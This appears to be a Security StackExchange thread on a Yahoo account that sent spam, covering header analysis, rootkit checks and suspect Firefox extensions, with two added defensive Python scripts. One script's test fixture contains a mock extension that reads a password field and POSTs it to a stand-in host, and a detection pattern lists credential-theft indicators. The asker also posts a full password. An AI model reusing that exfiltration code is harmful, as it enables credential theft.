
My Yahoo email account was sending spams at about 6:42pm EDT (the spams show 3:42pm PDT) yesterday. I realized it by receiving several "Failure Notice" emails because Yahoo was unable to deliver the spam messages to some of the intended addresses.

As much as I would like to know how to prevent such a thing from happening, I would like to understand how the spam emails could possibly have been sent from my email account. Is it possible that someone else accessed my account to use it to send spams?

  1. Suppose they didn't actually log into and send emails from my account,

    • I wonder how the spams were also stored in my "Sent" folder?

    • I also checked "Recent Login Activity" of my yahoo account, but all recorded locations and IP addresses from 4:47 PM the day before yesterday till late yesterday night are my own. I wonder how it is possible that someone else accessed my account to use it to send spams?

  2. Suppose they did actually log into and send spams from my account.

    I wonder how they could possibly manage it, given that I had taken the following steps before the spamming happened?

    • My original password (p+N4th@y8yUcer4pr6HeyE2ewa2Ebu!e) was really long, 32 characters with capital and little letters, numbers and other types of characters, generated by some online random password generator. Also I haven't shared my password with any other website or person. Is such a password possible to guess?

    • My OS has already been Ubuntu 12.04.

      My browser has been Firefox 13.0. There are some installed Firefox Extensions (Brief, DownloadHelper, DownThemAll!, FlashGot, Global Menu Bar integration, Google Translator, Greasemonkey, Mason, Session Manager, Ubuntu Firefox Modifications), Plugins (Adobe Reader, DivX Web Player, Google Talk Plugin, Google Talk Plugin Video Accelerator, iTunes Application Detector, QuickTime Plug-in, Shockwave Flash, VLC Multimedia Plugin, Windows Media Player Plug-in), and user scripts (Google Book Downloader, Google Search -Remove Redirection, Scrub Google Redirect Links).

      I also used ClamTK to scan my home partition for viruses and found none.

    • I sometimes opened spam emails, but never clicked hidden or non-hidden links in them.

    • Added: I just ran rkhunter on my Ubuntu. The output of `./rkhunter -C` is here and the output of `./rkhunter -c` is here. They look fine, do they?

    • Added: Also I pasted each of the following two headers into geobytes spam locator, and found the sources of the spam emails are both from the same IP 187.41.82.250 in a different country (Brazil) from mine (USA). Does it mean the spams were actually not sent from my email account?


Header of one spam saved in my "Sent" folder:

```
From Tim Thu Jun 14 15:42:07 2012
X-YMail-OSG: ivy79oIVM1k8kPIPgi4nfJh2JPdWcnzc7If0UmOfBQtmnkB
 nEmfLnPHJ
Received: from [187.41.82.250] by web162602.mail.bf1.yahoo.com via HTTP; Thu, 14 Jun 2012 15:42:07 PDT
X-Mailer: YahooMailWebService/0.8.118.349524
Message-ID: <1339713727.16968.BPMail_high_noncarrier@web162602.mail.bf1.yahoo.com>
Date: Thu, 14 Jun 2012 15:42:07 -0700 (PDT)
From: Tim <tim@yahoo.com>
Subject: HI
To: bankofamerica@replies.em.bankofamerica.com
Bcc: xxx@hotmail.com, xxx@yahoo.com, 
    xxx@gmail.com, 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 71
```

Yahoo notice of failure to deliver the spam to some intended address:

```
Sorry, we were unable to deliver your message to the following address.

<bankofamerica@replies.em.bankofamerica.com>:
Remote host said: 550 5.1.1 <bankofamerica@replies.em.bankofamerica.com> User unknown; rejecting [RCPT_TO]

--- Below this line is a copy of the message.

Received: from [98.139.212.148] by nm21.bullet.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
Received: from [98.139.212.214] by tm5.bullet.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
Received: from [127.0.0.1] by omp1023.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 395299.5507.bm@omp1023.mail.bf1.yahoo.com
Received: (qmail 91992 invoked by uid 60001); 14 Jun 2012 22:42:08 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1339713728; bh=3k5IzdOBwo7Jx0VjjcU11ALbzymfvrJ2SheLqHngG7s=; h=X-YMail-OSG:Received:X-Mailer:Message-ID:Date:From:Subject:To:MIME-Version:Content-Type; b=mk5ksTksAaA1u+2GJaaQoJaClM5AQeOmUn4A9e3xYyJVpER/mKvPB6e5NJlZ2WG1zhOvnrMUHGgqwxMMa7lf3K9tHzGxhbLddTxfM0udgCC2Ws4d7ebgACo2lT/92A9qGxxPIXQCSAEiK8/C7P5rQ6ZAOGOv5xMHuSMY3lUzs9Y=
DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Message-ID:Date:From:Subject:To:MIME-Version:Content-Type;
  b=enSetbkOfQmTtzS221NeSMw+dVAbV6y4iFhhSye/tdOobEqExxBebaFrFsehnXbU10/kB00lr3EVDJFCcYoJT5Sp9a7bz1r9L3CezVCrqeolUUNSN4R9qjreJCxk3YxcTnm9f//PvAIPDsqadFmZyDXcT5FyUEfiwb0cyERbL90=;
X-YMail-OSG: ivy79oIVM1k8kPIPgi4nfJh2JPdWcnzc7If0UmOfBQtmnkB
 nEmfLnPHJ
Received: from [187.41.82.250] by web162602.mail.bf1.yahoo.com via HTTP; Thu, 14 Jun 2012 15:42:07 PDT
X-Mailer: YahooMailWebService/0.8.118.349524
Message-ID: <1339713727.16968.BPMail_high_noncarrier@web162602.mail.bf1.yahoo.com>
Date: Thu, 14 Jun 2012 15:42:07 -0700 (PDT)
From: Tim <tim@yahoo.com>
Subject: HI
To: bankofamerica@replies.em.bankofamerica.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
```
Scott Pack
Tim
  • Had you ever accessed the account on a Windows machine? The simple answer to this question is they knew your password. Did you have a recovery email set to your Yahoo email account? If you access your email from an email client they didn't need to know your password since it likely was stored in the program itself. In other words they simply sent the email from your own computer. – Ramhound Jun 15 '12 at 17:26
  • (1) I don't remember the last time I accessed my account on a Windows machine. If it happened, it would be more than one year ago, before my password was reset. (2) I have a different email account set for my Yahoo account. That account doesn't send spams yet. – Tim Jun 15 '12 at 17:36
  • Do you have any browser extensions or plugins installed on FF? – DKNUCKLES Jun 15 '12 at 20:40
  • @DKNUCKLES: What did you suspect? **Extensions** (Brief, DownloadHelper, DownThemAll!, FlashGot, Global Menu Bar integration, Google Translator, Greasemonkey, Mason, Session Manager, Ubuntu Firefox Modifications), **Plugins** (Adobe Reader, DivX Web Player, Google Talk Plugin, Google Talk Plugin Video Accelerator, iTunes Application Detector, QuickTime Plug-in, Shockwave Flash, VLC Multimedia Plugin, Windows Media Player Plug-in), **User scripts** (Google Book Downloader, Google Search -Remove Redirection, Scrub Google Redirect Links). – Tim Jun 15 '12 at 20:47
  • Am I correct in that you are not logged in using a mail client? (On Windows it would likely be Outlook, on Ubuntu Evolution, but there are many other apps, including phone apps, and many protocols that they would use, POP3, IMAP, etc. Additionally, if SMTP was used to send mail, it possibly does not count as logging in, as that would be done with POP3 and would be necessary for receiving.) – 700 Software Jun 15 '12 at 21:13
  • Just to be sure, you did get the spamming to stop by now, right? (I hope you did change your password by now. Is that what stopped it?) – 700 Software Jun 15 '12 at 21:15
  • @George: (1) I only log into my Yahoo email account using browsers (Firefox, rarely Google Chrome) on my Ubuntu, not from phones. (2) The spams showed that they were sent at 6:42pm EDT yesterday. I didn't realize it until about 8pm EDT, when I saw the failure notice emails in my "Inbox" sent from Yahoo because it was not able to deliver the spams to some addresses, and I also saw those sent spams in my "Sent". At that time I changed my password. Since then, I haven't seen any sent emails in my "Sent" or got any email notification in my "Inbox" for not being able to deliver some spams. – Tim Jun 15 '12 at 21:19
  • Does Yahoo's account activity page show *logins* or does it show the IP addresses of already-logged-in accounts? Could someone have stolen your login cookie and used it on another machine? Have you ever used this machine at, for example, a coffee shop? Did you have your Yahoo e-mail configured on a mobile device? – mpontillo Jun 20 '12 at 20:41
  • Also check your recent login activity in your Yahoo Account. I had the same problem on my Mac Pro. I started being paranoid about my Mac security. Today I've got another SPAM sent from yahoo YahooMailWebService x-mailer. Email is still in Sent folder, no sign of login through the yahoo front end though. –  Jun 20 '12 at 19:58
  • Did you contact Yahoo? In my case, they just sent a bunch of links to their FAQ on how to fight spams. Really unhelpful. – Tim Jun 20 '12 at 20:11
  • I agree. They are (as a service support) not so helpful. But this login activity helped me to move my investigation to a different level. One thing more. After the previous spam attack from my account, I deleted (moving them first to another app) almost all addresses from my Yahoo address book. Today's attack was limited to what was left there. Weird. Looks like the Yahoo API or, more likely, Firefox with some suspicious addons was used; also the IP addresses of the attacker from the "FROM" field: –  Jun 20 '12 at 20:35
  • 93.86.122.164 (Serbia), 211.25.227.106 twice (Malaysia), 190.188.49.243 today (Argentina) –  Jun 20 '12 at 20:43
  • In my case, after I changed my password, there haven't been any spams sent out yet. I haven't deleted my contacts. – Tim Jun 20 '12 at 21:11
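As an added example (not part of the question or of any answer on this page), here is a small Python script that does the triage the question did by hand with the geobytes locator: it parses the bounce copy of the spam, walks the `Received:` chain from the oldest hop, and reports the client IP that submitted the message through Yahoo's webmail front end together with the `X-Mailer:` value, then compares that IP with the networks you recognize from "Recent Login Activity". The headers are the ones quoted above (DKIM and DomainKey lines omitted, they play no part here); the trusted network `203.0.113.0/24` is a constructed placeholder for your own addresses.

```python
import re
from email import message_from_string
from ipaddress import ip_address, ip_network

# Bounce copy of the spam as quoted in the question (mbox "From " line dropped,
# DKIM/DomainKey signatures omitted for brevity; they are not used here).
BOUNCE_COPY_HEADERS = """\
Received: from [98.139.212.148] by nm21.bullet.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
Received: from [98.139.212.214] by tm5.bullet.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
Received: from [127.0.0.1] by omp1023.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 395299.5507.bm@omp1023.mail.bf1.yahoo.com
Received: (qmail 91992 invoked by uid 60001); 14 Jun 2012 22:42:08 -0000
X-YMail-OSG: ivy79oIVM1k8kPIPgi4nfJh2JPdWcnzc7If0UmOfBQtmnkB
 nEmfLnPHJ
Received: from [187.41.82.250] by web162602.mail.bf1.yahoo.com via HTTP; Thu, 14 Jun 2012 15:42:07 PDT
X-Mailer: YahooMailWebService/0.8.118.349524
Message-ID: <1339713727.16968.BPMail_high_noncarrier@web162602.mail.bf1.yahoo.com>
Date: Thu, 14 Jun 2012 15:42:07 -0700 (PDT)
From: Tim <tim@yahoo.com>
Subject: HI
To: bankofamerica@replies.em.bankofamerica.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

"""

# Constructed placeholder for the networks listed in your own "Recent Login
# Activity" (RFC 5737 documentation range; substitute your real addresses).
OWN_NETWORKS = ["203.0.113.0/24"]

# Matches the "from [a.b.c.d] by <server> via|with <transport>" shape that
# Yahoo's hops use; hops without a bracketed client address are skipped.
HOP_RE = re.compile(
    r"from \[(\d{1,3}(?:\.\d{1,3}){3})\] by (\S+)(?: (?:via|with) ([^\s;]+))?"
)


def received_hops(raw_headers):
    """Return (client_ip, receiving_server, transport) for every Received hop
    that names a client address, ordered oldest hop first."""
    msg = message_from_string(raw_headers)
    hops = []
    for value in msg.get_all("Received", []):
        m = HOP_RE.search(" ".join(value.split()))  # unfold continuation lines
        if m:
            hops.append((m.group(1), m.group(2), m.group(3) or ""))
    hops.reverse()  # headers list the newest hop first; the submission hop is last
    return hops


def classify_origin(raw_headers, own_networks):
    """Identify the address that submitted the message and say whether it is one
    of your own networks, a provider-internal address, or an unknown client."""
    msg = message_from_string(raw_headers)
    result = {"x_mailer": msg.get("X-Mailer"), "client_ip": None,
              "transport": None, "verdict": "no-client-hop"}
    hops = received_hops(raw_headers)
    if not hops:
        return result
    ip, _server, transport = hops[0]
    addr = ip_address(ip)
    result.update(client_ip=ip, transport=transport)
    if any(addr in ip_network(n) for n in own_networks):
        result["verdict"] = "own-network"
    elif addr.is_private or addr.is_loopback:
        result["verdict"] = "provider-internal"
    else:
        result["verdict"] = "unknown-client"
    return result


if __name__ == "__main__":
    for hop in received_hops(BOUNCE_COPY_HEADERS):
        print("hop:", hop)
    print(classify_origin(BOUNCE_COPY_HEADERS, OWN_NETWORKS))
```

For the headers above the oldest hop is `187.41.82.250` submitting `via HTTP`, so the verdict is `unknown-client`. Read that the way DKNUCKLES and dr jimbob do below: the `via HTTP` line is written by Yahoo's own webmail server, so an address outside your login history does not mean the mail bypassed your account; it means a browser session or your credentials were used from that address, which is the cue to change the password and review extensions rather than to dismiss the message as forged.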

2 Answers

There are a variety of ways in which someone can access your account, but in your instance I would say it looks as though you've either got a keylogger or a rootkit on your machine, or a dirty computer on your network that is sniffing the traffic (potentially stripping the SSL).

The reason I say this is because your password is so long and complex that it's highly unlikely it was guessed by someone, and even less likely it was brute forced. The fact that the last login IP on the account was your own also indicates that the account was logged into from your network, which furthers my suspicion of a rootkit or malicious back door.

Try running rkhunter on your machine and see if anything pops up. Aside from that I would check other machines on your network for bugs as well. In the meantime though, change your password on your Yahoo account to prevent further spam.

DKNUCKLES
  • Thanks! (1) By "potentially stripping the SSL", do you mean that when I was accessing my email account, the dirty machine intercepted my traffic and analyzed it to figure out my account's password? (2) I was also accessing my Gmail account at the same time, and more often. It has a much shorter password with lowercase letters and numbers only. I wonder why that wasn't hacked first? – Tim Jun 15 '12 at 18:13
  • Yes that's exactly what I'm saying. SSL Strip is a MITM attack whereby the user can intercept your SSL traffic and harvest your credentials - More info : http://www.securitytube.net/video/157 – DKNUCKLES Jun 15 '12 at 18:18
  • Thanks! (1) I just ran rkhunter on my Ubuntu. The output of `./rkhunter -C` is [here](http://pastebin.com/gq123F9z) and the output of `./rkhunter -c` is [here](http://pastebin.com/gQmDvxrJ). They look fine, do they? (2) Also I am not able to check others' computers in the same network. Besides changing my password, is there any other way to protect myself more? For example, to secure my traffic more? Does installing a firewall help? – Tim Jun 15 '12 at 19:34
  • (3) Also I pasted the two headers into [spam locator](http://www.geobytes.com/spamlocator.htm?GetLocation#MessagePath), and found the sources of the spam emails are from a different country (Brazil) from mine (USA). Does it mean the spams were actually not sent from my email account? – Tim Jun 15 '12 at 19:34
  • That is quite bizarre, however if the e-mails are listed in your Sent items as you describe then it would have had to have been sent from your Yahoo server with your credentials. It's odd though that it's from a Brazilian IP address, when if the traffic was coming from your network (which the Yahoo logs claim) the attacker would have likely used an American server as that's where you reside... – DKNUCKLES Jun 15 '12 at 20:18
  • Thanks! How about (1) the outputs of rkhunter and (2) ways to protect my system? – Tim Jun 15 '12 at 20:32
  • The output of rkhunter looks okay to me (although admittedly I'm no expert) and there are reports that SSL Strip can be mitigated by forcing HTTPS connections, or perhaps passing all traffic through an encrypted VPN. – DKNUCKLES Jun 15 '12 at 20:40
  • Yes, I was using a VPN this afternoon. Which line shows the "reports"? – Tim Jun 15 '12 at 20:42
  • starting at 1703 – DKNUCKLES Jun 15 '12 at 20:44
  • I meant which line shows the "reports that SSL Strip can be mitigated by forcing HTTPS connections, or perhaps passing all traffic through an encrypted VPN", not the summary at the end. – Tim Jun 15 '12 at 20:59

Looking at the emails, the line

```
X-Mailer: YahooMailWebService/0.8.118.349524
```

sticks out as possibly important. That is, it seems that they did not use a regular login into webmail but are using Yahoo's Mail Web Service API to access your account (that is, you gave a third-party application an OAuth token to access your account). Have you granted any applications (e.g., an iOS/Android app on a mobile device) or a website any sort of access to your email account?

I don't use yahoo mail regularly (have an account only for fantasy sports) and would like to check that you never see that line in your normally sent emails (e.g., when you use webmail). I'd check your Account Settings (Manage Apps and Website Connections - I think is the correct setting), and check that you haven't granted any websites/applications third-party access to your account (including the ability to send mail). (Apparently this is normal headers for sending webmail from Yahoo.)

Check that you don't have any malicious browser extensions installed on your web browser (the kind that have access to all your information and conceivably could steal login information).

Due to the high number of Firefox user scripts/plugins/extensions you are using, one of them may easily be stealing your password. Basically, a browser extension/user script that you install can do anything to any webpage if the extension has permission to load on that page: read session cookies, see what text is typed in password fields, and even send information back to attacker-controlled servers, etc. Find your extension directory (`~/.mozilla/firefox/[random chars].default/extensions/`) and user script directory and try looking through the source code for suspicious behavior from lesser-known sources. `*.xpi` files are just zip files; open them up (and any included jar, also just a zip) and browse the source. Search for things like password/passwd/yahoo in applications that should have nothing to do with logging into applications.

dr jimbob
  • Thanks! (1) "Have you granted any applications (e.g., iOS/android app on a mobile device) or a website any sort of access to your email account?" No. (2) My Firefox extensions, plugin and user scripts are listed in my comment above. – Tim Jun 15 '12 at 21:05
  • Have you gone to your Yahoo account settings and double checked that "Manage Apps and Website Connections" doesn't have anything suspect listed? Also that's a lot of extensions; it's fairly easy to write malicious javascript http://security.stackexchange.com/questions/5875/what-are-the-security-implications-of-people-downloading-plugins-wrongly-thinki http://security.stackexchange.com/questions/15259/worst-case-scenario-what-can-a-chrome-extension-do-with-your-data-on-all-websi – dr jimbob Jun 15 '12 at 21:06
  • The only things listed under "Manage Apps and Website Connections" are the stackexchange sites. Shall I remove them? – Tim Jun 15 '12 at 21:14
  • Hmm. So I just signed up for yahoo mail and it seems it does report your computer's IP address used when accessing webmail and says `Received: from [123.123.123.123] by web122504.mail.ne1.yahoo.com via HTTP; Fri, 15 Jun 2012 14:14:35 PDT` `X-Mailer: YahooMailWebService/0.8.118.349524`. Interesting as gmail does not publicly give your IP address out when you login via webmail (but will list it when you use SMTP from say a email client to send). – dr jimbob Jun 15 '12 at 21:21
  • (1) Forgot to mention: I only log into my Yahoo email account using browsers Firefox (rarely Google chrome) on my Ubuntu, not from phones. (2) So I guess "YahooMailWebService/0.8.118.349524" means the API, and what does "X-Mailer" mean? – Tim Jun 15 '12 at 21:23
  • X-Mailer, means the application that mails it. But yahoo adds that `X-Mailer: YahooMailWebService` header for all messages; I had searched for yahoo mail web service and the first thing that came up was its API, so I thought I may have been on to something; but apparently not. – dr jimbob Jun 15 '12 at 21:55
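To make the extension audit in this answer concrete, here is an added Python script (not dr jimbob's code and nothing shipped with Firefox) that opens every `.xpi` under a profile's `extensions/` directory as a zip, descends into any `.jar` inside, and lists the lines of script that mention password/passwd/yahoo, read cookies or password fields, or build `XMLHttpRequest`s. The sample extension it builds in memory is a constructed fixture, not a real add-on, and the keyword list is my own choice following the search terms suggested above; `scan_extensions_dir` takes the profile directory the answer names.

```python
import io
import re
import zipfile
from pathlib import Path

# Search terms suggested in the answer plus a few that indicate data leaving the
# browser. Hits are leads to read in context, not verdicts: a password manager
# add-on legitimately mentions password fields.
SUSPICIOUS = re.compile(
    r"passw(?:or)?d|yahoo|XMLHttpRequest|\.cookie|type\s*=\s*[\"']password[\"']",
    re.IGNORECASE,
)
CODE_SUFFIXES = (".js", ".jsm", ".xul", ".html", ".htm")


def scan_archive(data, label, findings=None):
    """Walk a zip-format archive (.xpi, or a .jar found inside one) and record
    (member, line number, matched term, excerpt) for each suspicious line.
    Nested jars are descended into recursively and labelled with '!' separators."""
    if findings is None:
        findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            member = f"{label}!{info.filename}"
            payload = zf.read(info)
            name = info.filename.lower()
            if name.endswith(".jar"):
                scan_archive(payload, member, findings)
            elif name.endswith(CODE_SUFFIXES):
                text = payload.decode("utf-8", "replace")
                for lineno, line in enumerate(text.splitlines(), 1):
                    m = SUSPICIOUS.search(line)
                    if m:
                        findings.append((member, lineno, m.group(0), line.strip()[:120]))
    return findings


def scan_extensions_dir(profile_dir):
    """Scan every .xpi under <profile>/extensions/ (the directory named in the
    answer) and return the combined findings, oldest-listed extension first."""
    findings = []
    for xpi in sorted(Path(profile_dir, "extensions").glob("*.xpi")):
        scan_archive(xpi.read_bytes(), xpi.name, findings)
    return findings


def build_sample_xpi():
    """Constructed fixture: a tiny extension with an inner .jar whose script
    reads a password field and opens an outbound request. Not a real add-on."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as jar:
        jar.writestr(
            "content/overlay.js",
            'var p = document.querySelector("input[type=password]").value;\n'
            'new XMLHttpRequest().open("POST", "http://example.invalid/c", true);\n',
        )
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as xpi:
        xpi.writestr("install.rdf", "<RDF/>")
        xpi.writestr("chrome/helper.jar", inner.getvalue())
        xpi.writestr("chrome/content/ui.js", "function toggle() { return true; }\n")
    return outer.getvalue()


if __name__ == "__main__":
    for member, lineno, term, excerpt in scan_archive(build_sample_xpi(), "sample.xpi"):
        print(f"{member}:{lineno}: [{term}] {excerpt}")
```

Run against a real profile with `scan_extensions_dir(Path.home() / ".mozilla/firefox/<profile>.default")`. Expect noise from well-known add-ons; the ones worth reading in full are those from lesser-known sources where a hit on a password field sits next to code that sends data to a host the extension has no business talking to, which is exactly the pattern the constructed fixture shows.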